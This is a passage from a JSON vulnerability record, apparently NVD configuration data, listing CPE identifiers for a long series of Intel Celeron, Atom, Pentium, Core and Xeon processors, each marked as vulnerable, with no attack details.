"cpe23Uri": "cpe:2.3:h:intel:celeron_j:j4105:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j4005:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j1750:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3445:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3200rk:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3130:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3745d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3745:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3735d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3590:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2760:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2580:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3827:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3826:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3825:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3558:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3708:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3950:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3955:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2508:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2358:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2516:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2350:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3550s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3550:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3437u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3427u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3339y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3337u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2557m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2550k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2405s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2400s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:680:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:480m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:650:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:580m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:520e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2316:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3610me:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3475s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3470t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3380m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3360m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3330s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3330:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2540m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2537m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2467m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2450p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2400:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2390t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:760:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:750s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:750:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:560um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:560m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:460m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:450m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3229y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3227u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3130m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3120me:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2367m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2365m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2312m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2310m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2105:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2102:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:530:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:380um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2920xm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:990x:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3820qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n4200:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_j:j4205:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_j:j3710:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3060:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3150:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2910:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2840:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2806:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2805:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3687u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3667u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3610qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3610qe:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2860qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2820qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2670qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2675qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2657m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2629m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2620m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:860:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:820qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:930:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:880:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:680um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:660um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:620ue:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:620m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x3430:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l3426:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5560:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:lc5518:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5530:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5520:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5506:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5504:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5675:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x5672:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5638:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5630:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5606:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:x7542:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l7555:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1505l_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1501l_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1501m_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225_v6:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1558l_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1545m_v5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j1850:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j1800:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3230rk:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3205rk:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3770d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3770:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3735f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3735e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3480:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3460:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2420:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3845:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3508:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3538:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3858:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3830:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2558:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2538:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2518:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2550:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2530:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3450:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3439y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3340m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3340:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3317u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3230m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2430m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2410m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2310:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2300:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:660:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:655k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:520um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:520m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3250t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3250:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3220:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3217ue:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3110m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2377m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2348m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2340ue:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2330m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2125:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2120t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:560:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:390m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:350m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:330um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:330m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:965:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:940xm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3740qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3615qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3615qe:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3537u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3520m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2715qe:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2710qe:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2640m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2637m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2600s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3470s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3470:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3450s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3350p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3340s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3320m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:3210m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2520m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2515e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2510e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2450m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2435m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2380p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:2320:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:670:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:661:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:540um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:540m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:430um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:430m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3225:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3220t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3120m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:3115c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2357m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2350m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2310e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2130:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i3:2100t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 